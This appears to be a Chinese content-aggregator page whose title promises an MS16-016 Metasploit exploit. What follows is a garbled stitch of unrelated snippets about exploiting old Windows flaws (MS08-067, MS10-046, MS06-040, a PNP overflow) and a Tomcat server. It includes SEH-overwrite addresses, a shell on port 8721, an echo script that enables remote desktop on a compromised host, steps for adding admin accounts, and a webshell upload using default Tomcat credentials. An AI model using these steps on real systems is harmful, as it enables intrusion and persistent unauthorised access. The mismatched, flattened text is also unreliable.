基于Metasploit的MS16-016本地溢出漏洞利用实战

合集下载

Metasploit-Windows漏洞的利用

Metasploit-Windows漏洞的利用

Metasploit漏洞的利用1windows 2000—MS04-011(震荡波)Nessus扫描结果:4windows 2000/2003—MS02-018(IIS)5windows 2000/2003—MS01-0236windows 2000/2003—MS06-0407windows 2000/2003—MS08-067 1、利用Metasploit Framework进行MS08-067缓冲区溢出攻击图1 使用Web界面图 2 选择exploit图 3 选择target 图 4 选择payload图 5 填写options 图 6 填写options 图 7 填写options图 8 执行exploit图 9 溢出过程图 10 查看目标主机信息图 11 目标主机IP信息图 12 在目标主机上添加管理员用户图 13 成功添加用户注:所有图中显示的乱码是因为msf console不支持中文编码显示。

2、开启目标主机的终端服务远程登录管理。

获得目标主机的command shell了,接下来就要开启目标主机的3389终端服务远程控制目标主机。

这里我们使用修改注册表的方法,启动终端服务—代码1:echo Windows Registry Editor Version 5.00 >>3389.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg echo "Enabled"="0" >>3389.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>3389.regecho "ShutdownWithoutLogon"="0" >>3389.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>3389.regecho "EnableAdminTSRemote"=dword:00000001 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>3389.reg echo "TSEnabled"=dword:00000001 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.regecho "Start"=dword:00000002 >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>3389.regecho "Start"=dword:00000002 >>3389.regecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.regecho "Hotkey"="1" >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.regecho "PortNumber"=dword:00000D3D >>3389.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.regecho "PortNumber"=dword:00000D3D >>3389.reg图 14 生成开启终端服务的注册表文件复制代码1,粘贴到msf console:图 15 复制代码图 16 粘贴代码图 17 查看生成的3389.reg文件图 18 导入注册表因为Windows 2000下开启终端服务不能像Windows XP一样可以立即生效,而是需要重启机器后才能生效。

利用漏洞进行溢出攻击及数据备份

利用漏洞进行溢出攻击及数据备份

利用漏洞进行溢出攻击及数据备份1. 实训目的(后果自负)利用系统漏洞进行溢出攻击是一种现今网络上常用的一种攻击手段,它利用C等高级语言对于数据、指针以及寄存器等保护不足及程序员在开发系统时的过错,通过多重手段屏蔽用户感知,从而获取用户所传递信息或者误导用户的网络应用操作。

本次练习主要目的是体验利用漏洞进行缓冲区溢出攻击。

数据备份是系统管理员日常进行系统、数据维护所必需掌握的技巧及手段,本次练习应用windows2003自带的备份工具进行数据备份。

2. 实训所需条件及环境硬件设备:局域网(含机柜、配线架、交换机等)、台式PC机软件支撑:Windows 2003、Windows XP以及BackTract5虚拟机网络拓扑结构:3. 实训内容3.1 利用metasploit进行溢出攻击练习①使用metasploit开启攻击首先是进入Metasploit。

可以点击【应用程序】→【BackTrack】→【Exploitation Tools】→【Network Exploitation Tools】→【Metasploit Framewrok】进入Metasploit外,也可以在图形界面下打开任意一个终端,直接输入msfconsole命令来进入Metasploit。

此时可以看到当前包含代码数量、参数状态及最新版本等,如下图所示,进入msf的工作平台后,输入search ms10-046查询攻击代码的存放路径,即可看到名为"ms10_046_shortcut_icon_dllloader"的相关信息。

接下来,使用如下指令载入攻击代码:Use windows/browser/ms10_046_shortcut_icon_dllloader回车后如下图所示,表示载入攻击代码成功。

此时,可以通过show options来查看可以(必需)进行的参数配置。

Metasploit简单的渗透测试案例

Metasploit简单的渗透测试案例

Metasploit简单的渗透测试案例案例背景:假设我们是一家网络安全公司的安全分析师,我们被雇佣来测试一些公司的网络安全性。

我们已经通过一些信息收集技术获得了公司的IP地址和域名。

现在我们将使用Metasploit来测试他们的网络安全性。

步骤1:信息收集首先,我们使用一些信息收集工具(如nmap)来确定目标公司的网络拓扑和开放端口。

通过分析这些信息,我们可以确定潜在的攻击目标。

步骤2:扫描漏洞接下来,我们使用Metasploit的漏洞扫描工具(如Nexpose)来扫描目标网络上的漏洞。

这些漏洞可能包括操作系统漏洞、应用程序漏洞、配置错误等。

通过扫描漏洞,我们可以确定哪些系统存在安全风险。

步骤3:选择攻击模块根据我们在步骤2中发现的漏洞,我们选择相应的攻击模块。

例如,如果我们发现目标系统上存在一个已知的漏洞,我们可以选择使用Metasploit的相应模块进行攻击。

步骤4:配置攻击模块在选择了攻击模块后,我们需要配置一些参数以适应目标系统。

这些参数可能包括目标IP地址、端口号、漏洞类型等。

我们可以使用Metasploit的命令行界面或图形界面来配置这些参数。

步骤5:执行攻击一旦我们配置好了攻击模块,我们可以使用Metasploit的exploit 命令来执行攻击。

Metasploit将尝试利用目标系统上的漏洞来获取对系统的控制权。

步骤6:获取权限一旦攻击成功,我们需要获取对目标系统的权限。

我们可以使用Metasploit的post-exploitation模块来执行各种任务,如查找敏感信息、提权、创建后门等。

步骤7:清理痕迹在完成渗透测试后,我们应该清理所有的痕迹,以确保我们没有留下任何可追溯的证据。

Metasploit提供了一些模块来执行这些任务,如清除日志、删除后门等。

步骤8:报告编写最后,我们应该撰写一份详细的报告,描述我们在渗透测试过程中发现的漏洞、攻击的成功率以及建议的修复措施。

这个报告将帮助目标公司了解他们的网络安全状况,并采取适当的措施来加强安全性。

菜鸟版Expliot编写指南的PNP溢出

菜鸟版Expliot编写指南的PNP溢出

expliot:菜鸟版Expliot编写指南的PNP溢出漏洞分析+利用疯狂代码 / ĵ:http://Security/Article73764.html来源:安全中国个月前和朋友聊天谈到现在网络上蠕虫、病毒是越来越猖狂前年“冲击波”去年“震荡波”今年还不知道又出什么呢?话音刚落个被命名为Zotob蠕虫病毒已经在8月15日开始传播后来几天该蠕虫变种相继产生对网络造成了定影响Zotob蠕虫是基于Windows2000 ;以上版本即插即用(PNP)服务中产生堆栈溢出漏洞远程攻击者通过TCP ;445或139端口向该服务提交畸形请求溢出后可能获取系统权限大家防范意识都比较强了很多用户都及时打了补丁而般个人防火墙默认规则也封堵了TCP ;139或445端口该漏洞破坏力已经明显不如以前“冲击波”们了言归正传我们还是来分析这个漏洞、漏洞起因及影响范围漏洞起因前面已经简单提到了我们可以参见漏洞公告从漏洞公告我们可以看出两点:1.漏洞起因:Windows ;2000版本以上PNP服务存在远程堆栈溢出漏洞“远程”是该服务可以通过RPC接口来远程2.影响范围:漏洞只对Windows ;2000 ;有真正威胁而要攻击XP和Windows2003均有定限制对于这个RPC接口如果在Windows ;2000上则可以远程匿名进行;在 ;Windows ;XP ;SP0、SP1上需要以个有效账号登录后才可以;在Windows ;XP ;SP2和Windows ;2003上只有管理员组用户才能远程其它账号只能本地2、远程溢出漏洞宏定位分析这部分工作我认为很重要因此在本文中正好讲清楚些所谓“宏定位”就是指我们应该对我们实现目标进行预先分析调试漏洞是这样做其它工作也是如此这步做好了我们在后面可以少走弯路1.对具有溢出漏洞服务进程归类这里我们将服务进程分为两类类是服务自身绑定了端口可以是TCP ;或UDP端口;另类当然是服务进程自身没有绑定任何端口对于前类服务远程机器直接通过传输层协议(TCP或UDP协议)+应用层协议(如RPC协议、http协议)来访问服务IIS、FTP、HTTP都属于这类服务如果他们服务存在漏洞我们可以通过重复绑定端口、复用来绕过防火墙检测对于后类服务远程机器通过传输层协议+命名管道(IPC$)+应用层协议来访问服务这也就是为什么我们访问LSASS、WorkStation等服务时候要先和远程机器建立IPC$空连接原因这类漏洞要利用要躲避防火墙检测实现起来要困难些这个我在后门会提到感染利用PNP溢出漏洞蠕虫后我们机器会弹出系统显示“系统处理c:\winnt\system32\services出乎意料终止”关机提示框根据以往经验我们可以看出该漏洞是存在于Services进程中这点和WorkStation服务样因此归为后类2.服务进程接收缓冲区长度是否足够这个问题集中体现在用于接收请求(如recv、recvfrom等)第3个参数len上如果指定len很小我们是无法次性传送功能复杂很长ShellCode这时就必须采用其他传送方式例如把ShellCode分段传送在10期另篇溢出文章编写分段传送ShellCode有介绍接收缓冲区长度问题般在服务进程自身绑定了端口溢出漏洞中出现因此PNP服务中可以暂不考虑3.异常发生位置这个问题是指我们向服务提交超长请求后会覆盖问题返回地址EIP等指针当返回时候跳转到我们覆盖数据指定地址时候可能发生异常;另外种情况就是在该返回的前由于我们覆盖了局部变量中其它指针导致对其进行引用时候发生异常简而言的就是ret前和ret后发生异常区别对于ret后异常我们可能需要通过KiUserExceptionDispatcher和监视点思路方法来联合定位溢出点并且漏洞利用方式有两种:改写EIP为jmp ;esp ;地址或改写SEH指针;而对于ret前异常我们般通过KiUserExceptionDispatcher来定位溢出点就够了利用时候也只能改写 ;SEH指针我们预先并不知道PNP溢出漏洞属于哪类不过等下面进步调试后就明确了4.如果是问题ret后异常则判断该约定这个问题是最容易被忽略如果我们能够采用jmp ;esp利用方式话可能很多人会在覆盖jmp ;esp位置紧接4个字节开始地方连接ShellCode问题就出在这里不管是Windows系统进程、第3方软件Software、还是我们自己用VC6、VC7编写只要和C/C相关般来说可以分为__cdecl和__stdcall两种约定采用__cdecl在返回需要者恢复实参占用堆栈也就是只执行返回指令为ret我们把ShellCode接到保存EIP后面是没问题;而采用__stdcall在返回是执行指令ret ;n自己恢复实参占用堆栈我们如果把ShellCode接到保存EIP后面话开始n个字节代码就执行不到了这也就是为什么我们在构造些系统进程溢出漏洞(如RPC、WorkStation、LSA等)攻击代码时候jmp ;esp地址后要有若干保留字节原因好了带着剩下问题我们继续3、PNP溢出漏洞进步分析+利用现在牛人们利用编写漏洞代码速度是越来越快了蠕虫出来两、 3天攻击代码就已经公布出来了既然有现成我们就直接拿过来用了于是我把 ;上公布代码拿来整理后编译执行结果目标机器还是发生了异常幸好是用VMWare(+Windows ;2000 ;SP4)作测试否则用我自己机器岂不麻烦?很显然攻击代码存在问题再看看网上代码中地址填充:EvilRPC.SDA[76] ;= ;0x3e;EvilRPC.SDA[77] ;= ;0x1e;EvilRPC.SDA[78] ;= ;0x02;EvilRPC.SDA[79] ;= ;0x75;这个地址不是我们熟悉地址需要进步分析这样漏洞分析VMWARE和SoftICE组合是再合适不过了顺便向大家推荐:)启动VMWARE中SoftICE设置断点: ;bpx ;ntdll!KiUserExceptionDispatcher发生任何异常SoftICE都会先在这个第条指令停顿下来有关KiUserExceptionDispatcher及其参数详细介绍2004年黑防10期ISNO我是怎样发现CCPROXY溢出漏洞文中有详细介绍我在05年8期中对Realplay溢出漏洞分析中也有详细介绍大家可以参考这里我只结合本漏洞谈谈OK重新攻击VMWare系统果然弹出了SoftICE并停留在KiUserExceptionDispatcher入口处输入命令addr可以看到确是Services进程空间发生了异常输入命令:d ;(*(esp ;+ ;4) ;+ ;b4), ;得到异常发生时:EBP ;= ;0x005bf874, ;EIP ;= ;0x76750199在输入命令d ;(*(esp ;+ ;4) ;+ ;c4)得到异常发生时:ESP ;= ;0x005bf864调试到这里由EIP ;= ;0x76750199我们应该得出了个结论:该漏洞是典型ret前异常换句话说就是在问题返回的前就已经发生了异常按照前面宏定位分析网上公布代码是定利用了改写SEH指针方式我们来证明下:输入命令d ;fs:0我们看到当前线程S ;E ;H结构位于0x005bf8f8处再输入命令d ;ss:005bf8f8看到了当前线程SEH结构8字节呵呵当前线程异常处理指针是0x75021e3e也就是前面看到填充地址证明了我前面假设我们将该地址改为Windows ;2000下通用jmp ;ebx地址:0x7ffa1571前面4个字节填写为eb ;06 ;eb ;04然后将VMWare系统重启再次测试这下目标机器没有重启VMWare系统IP为192.168.1.8在本机输入telnet ;192.168.1.8 ;8721立即得到了Shell修改成功了小结:本文中我简单地和大家起对PNP服务溢出漏洞进行了分析分析过程不复杂只是我想通过这样分析调试和大家起分享我调试这些漏洞些经验本文中涉及宏定位分析在以后大家分析其它复杂漏洞时候同样适用我修改后代码细节可以参见光盘中源代码在Windows ;2000+VC6下编译、测试通过上篇文章: 推荐:从卡巴漏洞管窥内核模式Shellcode编写下篇文章: 推荐:我写CC思路及防范思路方法。

缓冲区溢出实现渗透入侵和提权

缓冲区溢出实现渗透入侵和提权

一个缓冲区溢出简单实例
这里以在Windows XP SP3操作系统环境下进行介绍,产生缓冲区溢出的过程如下: 步骤1:在Windows操作系统【运行】对话框“打开”文本框中输入“cmd”命令,即可
打开【命令提示符】窗口,如图6-1所示。这是Windows系统自带的命令行工具,可 执行各种内置的命令程序。 步骤2:在【命令提示符】窗口之中执行dir命令,即可看到在【命令提示符】窗口之 中显示了系统目录中的所有文件、目录及相关信息,如图6-2所示。
RPC服务远程溢出漏洞攻击
对DCOM接口进行相应的配置,具体的操作步骤如下: 步骤3:选择“位置”选项卡,在打开的设置对话框对DirectAccess Class对象进行位
置的设置,如图6-47所示。选择“安全”选项卡,在打开的设置对话框中对 DirectAccess Class对象进行启动和激活权限、访问权限和配置权限进行设置,如 图6-48所示。
一个缓冲区溢出简单实例
这里以在Windows XP SP3操作系统环境下进行介绍,产生缓冲区溢出的过程如下: 步骤3:dir命令还可以指定列表显示的路径,在【命令提示符】窗口之中输入命令
“dir c:\”,即可显示C盘根目录下的文件以及目录信息,如图6-3所示。 步骤4:如果在【命令提示符】窗口之中指定一个不存在的路径,即可显示“系统找不
本章结束,谢谢观赏
6-94所示。如果目标代理服务器是处于CCProxy的免密码状态,就会出现Banner信 息“CCProxy Telnet Server Ready”,如图6-95所示。 步骤2:如果目标代理服务器是处于CCProxy密码状态,即设置过代理用户名和密码, 则会提示输入用户名,随意输入几个字符,将会出现错误提示“User Invalid”, 如图6-96所示。这些信息都是CCProxy特有提示信息,可轻松确定目标代理服务器 是否安装了CCProxy。

msf对windows提权方法总结

msf对windows提权方法总结

Metasploit Framework(MSF)是一种渗透测试工具,它包括了许多模块和利用技术,其中一些专门用于在 Windows 系统上进行提权。

提权是指攻击者通过某种手
段获取更高权限的过程,通常是从普通用户升级为管理员或系统用户。

以下是一些在 Metasploit 中用于 Windows 提权的常见方法:
1.Local Exploits:
Metasploit 提供了一些本地漏洞利用模块,用于利用目标系统上的已知漏洞。

这些模块可能涉及到某些服务或应用程序的漏洞,通过这些漏洞攻击者可以
获得更高的权限。

例如:
2.Post Exploitation Modules:
Metasploit 还提供了一些用于后期渗透的模块,用于在系统上查找提权的机
会。

这些模块通常在获取初始访问权限后运行,以寻找系统中的漏洞或弱点。

例如:
3.Token Impersonation:
在 Windows 中,通过令牌伪造(Token Impersonation)技术,攻击者可以使
用已经获得的令牌来获取更高的权限。

Metasploit 提供了一些与令牌相关的
模块,用于伪造或注入令牌。

例如:
4.Exploit Suggester:
Metasploit 中的post/multi/recon/local_exploit_suggester模块用于自动检测目标系统上可能存在的提权机会。

它会分析系统信息,查找可能的本地漏洞,然后建议相应的模块。

这些只是 Metasploit 中一些常见的 Windows 提权方法,实际使用时需要根据目标系统的具体情况选择适当的模块。

实验11 Windows系统缓冲区溢出漏洞利用

实验11 Windows系统缓冲区溢出漏洞利用

Windows系统缓冲区溢出漏洞利用(MS06-040)(SEC-W05-001.1)微软的Server 服务中存在一个远程执行代码漏洞,成功利用此漏洞的攻击者可以完全控制受影响的系统。

实验目的:通过本实验可以了解Windows系统漏洞所能带来的危险,以及如何针对特定的Windows 系统漏洞进行防御。

实验环境:准备一台win2000(未安装补丁文件为Windows2000-KB921883-x86-CHS.EXE,存在远程执行代码漏洞),设置其IP地址为192.168.100.100准备一台win xp电脑,设置其IP地址为192.168.100.101实验准备:首先安装MetaSploit Framework 3.1(在winxp上电脑进行安装)注:在安装过程中,请不要关闭任何弹出的窗口,否则将导致MetaSploit Framework 3.1安装完成后无法使用,必须再次重新安装才可以。

接着安装之后,进行如下操作:1.GUI界面下使用Metasploit:从开始菜单里点击"程序"->"Metasploit 3"->"Metasploit 3 GUI",界面如图1所示:图12.直接在搜索栏输入"ms06_040",返回结果"ms06_040_netapi"如图2所示:图23.双击返回结果"ms06_040_netapi",弹出目标机操作系统选择对话框,请选择"Automatic",如图3所示:图34.点击"前进",选择payload 参数"windows/shell_bind_tcp"后点击"前进"。

图45.在RHOST参数里填上目标机的IP地址(192..168.100.100),其它项按默认配置进行。

完整版Metasploit利用溢出漏洞远控Windows靶机操作指南

完整版Metasploit利用溢出漏洞远控Windows靶机操作指南

1网络测试环境构建首先需要先配置好一个渗透测试用的网络环境, 包括如图1所示的运行Kali Linux 系统的计算机,如图2所示的Windows Server 2003系统的计算机和如图 3所示的运行 Windows 7系统的计算机。

显然这三台计算机处于同一个网段中, 可以相互通讯,Kali 系统用作攻击机,下面将在此系统上运行 Metasploit 进行 渗透测试,而 Windows 2003和Windows 7系统都是本次任务中需要进行渗透入 图1 Kali 攻击机侵的靶机,保持安装后的默认状态,没有打额外的系统安全补丁。

rootMlflj2Ki3)f 厂 mine: 0carrie 『;3F 叽 r-1j 3 kA 丄PM AppLitutlgin 兮 PLic 砂常 l*-lLink enc ap r Lor al L 二口pback Irwt 1 LmtB add r i : :1/12B UP LOOPBACK RUNNING packets : 32 归「厂口 [厂石 TX packets : 32 er rars RXfl-4 IFcanflgLlrik anc4p :EThemQt HWidek ftG L G C .29^30:25: flinot addr-l :0_] 0.10.13? Beast 11©. 10.13.255 貼 Lnatfi addn fgfid r 1513c = 29f f : fofifli:25t 1/^4 JScjppa : I UP BROADCAST HUftNI^G MULHC4ST hlTU:垢舲 Moir R H pKket§: 136S7 errors:® repped :9 ovtrnjri9:9 IM packets :2S£I 92 e r r : rs:& d repp^d : G overnjfisM3 c oil 丄^icns : D t Kqdfi je L 色n :1 HUJ X J ftH b>T«:9U9JS {»Q,5 Kim TK b/tH :117672LfiHwle 苦乩(L0卫Stope: Hast MTU: 655 3S Metric:!i z B dropped ; 3 o^erruriB : 0 i :0 dropped :fl overruns :A :© _ilo fc&i Via^r Sajieh T<rminjl Holp啦rgl ⑭giffirrfFic <.vmnv*] \ i 1.4 “・hicngDft甕嗣叶E『皈盂5.J,37»®13 战•乜所有I¥fl5-W03 Hivrc^nrt Corp.习上邛缶Ci M>cuinciinCt nrrti M^djnmlittriAtor^iipetinl ijM . idtoua 1 P C^ivf IgLJUl llill"Kpi">T4R€*nn«hot i«n -cpeo 11 lc 1HH£ £uff lx B s la>c-iLdi>»j.ni irp R魁百■#£*#•*•,**■!:■目』心」珊fiaihriec■■•・■■・■・■・■罩科鼠齐五丄!5鶯J・Default GatESLy - - * ・」〜亠.匕19B18b IB■耀p:K*[11ifi«'■JlLUilAitl.r(ltCc Fg%w;u・ji:…m ?图 2 Windows 2003 靶机CbHi图3 Win dows 7靶机2扫描靶机在正式开始渗透之前,应该对靶机进行扫描探测工作,搞清楚渗透目标的系统类型、开放的端口服务、如图4所示,在Kali攻击机上执行Msfconsole命令,即可进入Metasploit 环境,如图5所示。

基于MSF的Windows系统漏洞溢出仿真实验

基于MSF的Windows系统漏洞溢出仿真实验

摘 要: 在分析 Stuxnet 蠕虫病毒的基础上,介绍该病毒所利用的 MS10 _046 系统漏洞原理及机制。利
用 VMWare 和 MSF( MetaSploit FrameWork) 搭建局域网实验环境平台,设计 MS10_046 漏洞溢出实验的
方法与步骤,在得到的 Cmd Shell 命令行下建立了测试帐户并对测试帐户进行了提权处理,最后给出了
0引言
安全漏洞 ( Security Hole) 是指信息系统在设计、 编码、实现、配置、运行中无法避免地会出现错误,这些 存在的 错 误 有 些 会 导 致 被 渗 透 ( Exploit) 的 脆 弱 性 ( Vulnerability) 。计算机脆弱性是系统的一组特性,恶 意的主体( 攻击者或者攻击程序) 能够利用这组特性, 通过已授权的手段和方式获取对资源的未授权访问, 或者对系统造成损害[1-2]。
对系统漏洞的一些防范措施。结果表明,基于 MSF 的实验平台可以很好地验证系统存在的已知漏洞,
从 系统漏洞; 漏洞溢出; MSF; VMWare; MS10_046; 安全漏润
中图分类号: TP 309
文献标志码: A
文章编号: 1006 - 7167( 2012) 12 - 0242 - 03
MSF-based Overflow Vulnerability in Windows System Simulation
ZHANG Hong-ruia, LV Yan-ganga, FENG Xiu-yana, XI Ya-fengb ( a. Department of Information Technology; b. Administration Office, Shijiazhuang Vocational Technology Institute,Shijiazhuang 050081,China)

Metasploit实战攻击汇总

Metasploit实战攻击汇总
7
MS10-046漏洞攻击
漏洞描述:
Microsoft Windows快捷方式LNK文件自动执行代码漏洞(MS10-046)
受影响系统: Microsoft Windows XP SP3 Microsoft Windows XP SP2 Microsoft Windows Vista SP2 Microsoft Windows Vista SP1 Microsoft Windows Server 2008 R2 Microsoft Windows Server 2003 SP2 Microsoft Windows 7
Metasploit实战攻击 作者:zhoumo_108
MS08-067漏洞攻击 MS10-046漏洞攻击 MS12-020漏洞攻击 MS12-063漏洞攻击 CVE-2014-0515漏洞攻击
1
MS08-067漏洞攻击
漏洞描述:
Microsoft Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067) Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻 击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统, SYSTEM权限执行任意指令。
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点 击LNK文件与点击快捷方式所指定的目标具有相同的效果。Windows没有正确地 处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定 的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置, 使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。
Microsoft Internet Explorer是微软公司推出的一款网页浏览器,使用相当 广泛。IE的execCommand函数在实现上存在释放后重用漏洞,远程攻击者 可能利用此漏洞通过诱使用户访问恶意网页执行挂马攻击,控制用户系统。 该函数在执行一个命令时,会先触发相应的事件函数,恶意攻击者可在事件 函数中重写html页面,致使某个对象被释放掉,但此时execCommand的操 作还没完成,这就导致了释放后重用漏洞。攻击者通过精心构造的页面,并 诱使受害用户访问,就可以达到在受害用户系统中执行任意指令的目的。

实验七-缓冲区溢出攻击实验

实验七-缓冲区溢出攻击实验

实验七缓冲区溢出攻击实验
一、实验目的
1、理解缓冲区溢出攻击的原理;
2、获取目标主机的最高权限,利用远程桌面登录。

二、实验环境
1、实验环境:Windows 2000/2003的目标主机,通过虚拟机加载;
2、软件工具:metasploit frmamework。

三、实验步骤
1.攻击目标
Windows 2000主机
2.攻击开始
步骤1:使用nmap对目标进行端口扫描
步骤2:目标开启135端口,可利用MS03-026漏洞进行入侵,用到的工具是metasploit frmamework。

安装完毕后选择console模式
(1)查询MS03-026漏洞所对应的溢出模块
(2)进入此模块
(3)设置有效载荷为执行特定命令,配置相关参数
(4)执行攻击命令,成功进入目标系统
(5)添加系统账号并把它加入系统管理员组中
四、实验小结:
缓冲区溢出,是针对程序设计缺陷,向程序输入缓冲区写入使之溢出的内容(通常是超过缓冲区能保存的最大数据量的数据),从而破坏程序运行、趁著中断之际并获取程序乃至
系统的控制权。

缓冲区溢出攻击的目的在于扰乱具有某些特权运行的程序的功能,这样可以使得攻击者取得程序的控制权,如果该程序具有足够的权限,那么整个主机就被控制了。

一般而言,攻击者攻击root程序,然后执行类似“exec(sh)”的执行代码来获得root权限的shell。

通过该实验我了解到通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。

造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。

Metasploit使用教程

Metasploit使用教程

Metasploit使用教程1. Metasploit简介这是一个免费,开源的工具包,分Linux/Unix版的和Windows版,考虑到大多数人都是使用的Windows系统,这里对Windows版的Metasploit使用方法说明一下,至于Linux/Unix下的使用方法和Windows下的大同小异,这里就不额外的说明了。

2. 下载与安装下载(/framework/download/) Metasploit v3.4.1的安装程序之后双击安装,傻瓜化的安装过程,这里就不多说了。

安装完成后可以看到桌面上有Metasploit Console的快捷方式,这个是命令行模式的控制台,图形界面控制台在开始—>程序—>Metasploit 3—>Metasploit Web下,下面我们看一下如何使用。

3. 命令行下使用运行Metasploit Console的快捷方式后首先看到的是Metasploit欢迎界面,我们输入“?”得到在线帮助(如图1所示):图1可以看到里面有很多的命令,下面我将最重要的几个做简单解释:“?”:得到帮助。

“cd”:更换当前的工作目录。

“exit”:退出。

“help”:得到帮助。

“info”: 显示当前程序的信息。

“quit”:推出程序。

“reload”:载入Exploit和payloads。

“save”:保存当前设置“setg”:设置一个环境变量。

“show”:显示可用的Exploit和payloads。

“use”:使用一个Exploit。

“version”:显示程序的版本。

为了展示您高超的技艺,可以学习一下命令的使用,呵呵;一般的测试通过图形界面来完成,还是比较方便的。

4. 图形界面下的使用方法,启动Metasploit Web,会自动关联浏览器打开控制台,此程序集成了众多的Exploit,所以我们要先了解一下程序中到底有那些溢出工具包,点击输入“Exploits”看有哪些可用的Exploit程序(如图2所示):图2显示溢出程序的程序名称和相应的简介。

缓冲溢出攻击实验报告

缓冲溢出攻击实验报告

一、实验目的及要求1. 了解缓冲区溢出攻击的原理和类型。

2. 掌握缓冲区溢出攻击的实验方法和步骤。

3. 理解缓冲区溢出攻击的危害性。

4. 学习防范和避免缓冲区溢出攻击的方法。

二、实验环境1. 操作系统:Windows 102. 编程语言:C/C++3. 漏洞利用工具:Metasploit4. 实验环境搭建:使用虚拟机软件(如VMware)搭建实验环境,靶机为Windows 7 SP1,攻击机为Kali Linux。

三、实验内容1. 漏洞分析:分析实验环境中存在的缓冲区溢出漏洞。

2. 攻击实现:利用Metasploit工具对靶机进行攻击,实现远程代码执行。

3. 防御措施:学习防范和避免缓冲区溢出攻击的方法。

四、实验步骤1. 漏洞分析- 使用Ghidra工具对实验环境中的漏洞程序进行反汇编,分析程序中的缓冲区溢出漏洞。

- 发现漏洞程序存在缓冲区溢出漏洞,攻击者可以通过输入超长字符串来覆盖返回地址,从而控制程序的执行流程。

2. 攻击实现- 使用Metasploit工具中的`exploit/multi/handler`模块,设置攻击目标为靶机的IP地址和端口。

- 使用`set payload`命令设置攻击载荷,选择`windows/x64/meterpreter/reverse_tcp`,该载荷可以在攻击成功后与攻击机建立反向连接。

- 使用`set LHOST`命令设置攻击机的IP地址,使用`set LPORT`命令设置端口号。

- 使用`set target`命令设置攻击目标,选择漏洞程序的模块和参数。

- 使用`exploit`命令启动攻击,等待攻击成功。

3. 防御措施- 代码审计:对程序进行代码审计,及时发现并修复缓冲区溢出漏洞。

- 输入验证:对用户输入进行严格的验证,限制输入长度,防止输入超长字符串。

- 边界检查:在代码中添加边界检查,防止缓冲区溢出。

- 安全编程:遵循安全编程规范,使用安全的编程语言和库,避免使用存在漏洞的函数。

(word完整版)Metasploit渗透测试实例分析要点

(word完整版)Metasploit渗透测试实例分析要点

Metasploit渗透测试实例分析摘要:随着信息技术的飞速发展,信息安全的概念也在逐步深入人心。

为了更好的保护用户信息,提高系统的安全性,渗透测试技术应运而生。

简而言之,渗透测试就是模拟黑客的技术手段去检测系统的安全性。

本文选择 Metasploit 渗透测试框架为平台,阐述了Metasploit框架的内容,详细讲解了不同界面下Metasploit 渗透框架的使用方法,详细讲解了Metasploit的所用功能和参数。

然后,本文以实际操作为基础,讲解怎样通过查找的漏洞进行对目标主机攻击来获得Meterpreter shell。

成功获取Meterpreter shell 之后就可以通过Metasploit一些基本的命令来收集更多的信息,以便达到对目标主机的长期控制和不被用户察觉。

关键词:渗透;Metasploit;Meterpreter shell。

Metasploit penetration testing example analysisAbstract:With the rapid development of information technology, information security is gradually becoming more popular。

In order to protect user information and to improve system security,penetration testing techniques have emerged. In short, penetration testing is a technology that simulates the means of hackers to check the security of a system.Paper chooses Metasploit penetration testing framework as a platform to explain the contents of the Metasploit Framework, a detailed account of the use of different interfaces under the Metasploit penetration framework Metasploit explained in detail by using the function and parameters. Then, the paper—based practice, explain how to find loopholes through the target host attack to get Meterpreter shell。

Metasploit溢出Tomcat管理台默认口令漏洞

Metasploit溢出Tomcat管理台默认口令漏洞

Metasploit溢出Tomcat管理台默认口令漏洞【实验目的】1) 利用Tomcat管理台默认口令漏洞,上传木马文件,获得目标主机webshell。

【实验原理】1) Tomcat 管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell。

【实验环境】【实验步骤】一、利用nmap工具扫描目标主机1.1 使用nmap命令对目标主机进行扫描。

单击桌面空白处,右键菜单选择“在终端中打开”。

如图1所示图11.2 在终端中输入命令“nmap –sV 192.168.1.3”,对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheTomcat/CoyoteJSP engine1.1。

如图2所示图21.3 在浏览器地址栏中输入http://192.168.1.3:8180,打开tomcat页面,单击“Tomcat Manager”,打开后台管理页面。

如图3所示图31.4 在弹出的对话框中,输入默认的账户tomcat,密码tomcat,单击”ok”。

如图4所示1.5 单击“Browse”按钮,在目录“/home/” 下选择hacker.war文件。

如图5所示1.6 单击“Deploy”按钮,上传木马,生成/hacker的目录。

如图6所示图61.7 在地址栏中输入http://192.168.1.3:8180/hacker/index.jsp,webshell密码“87966550”,登陆webshell。

如图7所示1.8 浏览器跳转到木马首页。

如图8所示1.9 在下拉框选择相应功能即可。

如图9所示图9。

Metasploit(MSF)渗透测试框架使用教程及基本命令

Metasploit(MSF)渗透测试框架使用教程及基本命令

Metasploit(MSF)渗透测试框架使用教程及基本命令使用Metasploit进行渗透测试需要一定的技术知识和经验。

以下是一些基本的Metasploit命令和使用教程,供初学者参考。

1. 启动Metasploit:在终端中输入"msfconsole",然后按回车键。

这将启动Metasploit的控制台界面。

2. 更新Metasploit:在控制台中输入"msfupdate",然后按回车键。

